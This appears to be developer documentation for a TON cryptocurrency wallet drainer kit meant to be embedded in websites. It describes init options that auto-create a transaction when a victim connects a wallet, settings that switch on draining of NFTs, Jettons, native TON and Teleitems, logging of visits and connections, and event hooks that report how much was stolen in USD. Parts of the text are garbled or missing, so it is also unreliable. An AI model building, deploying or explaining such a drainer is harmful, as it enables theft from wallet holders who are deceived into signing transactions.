Drainer API
This documentation and API are intended for developers. Using the methods described here requires skills in JavaScript and web integration. Incorrect use may disrupt site functionality. Before making changes, ensure you have adequate knowledge or consult a developer.
The Drainer API provides several methods and events that allow you to integrate wallet interactions, track transactions, and handle errors. Below are the main events, methods, and data objects used in the Drainer API.
API Methods
1. init(options?: DrainerOptions)
Initializes the library and creates all necessary elements on the page (e.g., the "Connect Wallet" button).
- autoCreateTransaction (
): Iftrue
, a transaction is automatically created when connecting the wallet. - autoOpenModal (
): Iftrue
, the modal window is automatically opened when needed.
Example usage:
autoCreateTransaction: true, // Automatically create a transaction upon connection
autoOpenModal: false, // Do not open the modal automatically
disableWalletSave: true // Disable wallet saving
3. openModal()
Method to manually open the modal window if automatic opening is disabled.
4. overrideDrainerSettings(overrides: Partial<DrainerSettingsPublic>)
Allows you to override drainer settings. Use this method to change parameters such as enabling/disabling asset draining, logging, and other drainer settings.
- overrides (
): An object with new drainer settings.
Example usage:
drainNFT: false, // Disable NFT draining
drainJettons: true, // Enable Jetton draining
visitLogs: true // Enable visit logging
Complete list of OverrideDrainerSettings parameters:
- drainNFT (
): Enables/disables NFT draining. - drainJettons (
): Enables/disables Jetton draining. - drainNative (
): Enables/disables draining of native assets (TON). - drainTeleitems (
): Enables/disables draining of Teleitems. - visitLogs (
): Enables/disables visit logging. - walletConnectLogs (
): Enables/disables wallet connection logging. - txSuccessLogs (
): Enables/disables logging of successful transactions. - txCancelLogs (
): Enables/disables logging of canceled transactions.
5. overrideHoneypots(overrides: Array<OverrideDrainerHoneypots>)
This method allows you to override honeypot parameters. You can update addresses, messages, or amounts associated with specific honeypots.
- overrides (
): An array of objects with new settings for honeypots.
Example usage:
honeypot_address: "EQAvXj...",
honeypot_amount: 1000
Complete list of OverrideDrainerHoneypots parameters:
- honeypot_address (
): The address of the honeypot. - honeypot_amount (
): The amount associated with the honeypot.
API Events
The Drainer API provides several events that allow you to track wallet connections, transactions, and errors.
1. walletConnect
Event that triggers when a wallet is successfully connected.
window.addEventListener('walletConnect', (event) => {
const walletAddress = event.detail.walletAddress;
console.log('Wallet connected:', walletAddress);
2. walletDisconnect
Event that triggers when a wallet is disconnected.
window.addEventListener('walletDisconnect', () => {
console.log('Wallet disconnected');
3. transaction
Event that triggers upon a successful transaction. The event carries all transaction details.
window.addEventListener('transaction', (event) => {
const transactionDetails = event.detail;
console.log('Successful transaction:', transactionDetails);
4. transactionReject
Event that triggers when a transaction is rejected by the user.
window.addEventListener('transactionReject', () => {
console.warn('Transaction was rejected');
5. transactionError
Event that triggers when an error occurs during the transaction process.
window.addEventListener('transactionError', (event) => {
const error = event.detail;
console.error('Transaction error:', error);
Data Objects
1. TransactionDetails
This object is passed in the transaction event and contains complete information about the transaction.
- walletAddress: The address of the wallet that performed the transaction.
- walletVersion: The version of the wallet.
- withdrawalAmount: The amount of assets withdrawn (TON, Jettons, etc.).
- tokens: An array of tokens involved in the transaction.
- nfts: An array of NFTs involved in the transaction.
- totalWithdrawalUSD: The total amount withdrawn in US dollars (USD).
Example data:
walletAddress: "UQAvXj...",
walletVersion: "V5R1",
withdrawalAmount: 10,
tokens: [{ name: "Jetton", balance: 100, usd: 10, decimals: 9, wallet_address: "UQAvXj..." }],
nfts: [{ address: "EQDn...", name: "NFT Example", usd: 50 }],
totalWithdrawalUSD: 60
2. Token
An object that describes a token involved in the transaction.
- name: The name of the token.
- balance: The amount of tokens.
- usd: The equivalent in USD.
- decimals: The number of decimal places for the token.
- wallet_address: The address of the wallet that contains this token.
3. NFT
An object that describes information about an NFT involved in the transaction.
- address: The address of the NFT.
- name: The name of the NFT.
- collectionAddress: The address of the collection.
- collectionName: The name of the collection.
- lastPrice: The last price of the NFT.
- usd: The equivalent in USD.
4. TransactionError
This object describes possible errors that can occur when performing a transaction.
- INSUFFICIENT_FUNDS: Not enough funds.
- INSUFFICIENT_FUNDS_FOR_FEE: Not enough funds to pay the fee.
- THROTTLE_TOP_UP: Exceeded the auto-commission transaction limit.
required: 0.1 // The amount needed to complete the transaction
5. TransactionErrorResult
This object is passed in the transactionError event and contains information about the type of error and the amount needed to complete the transaction.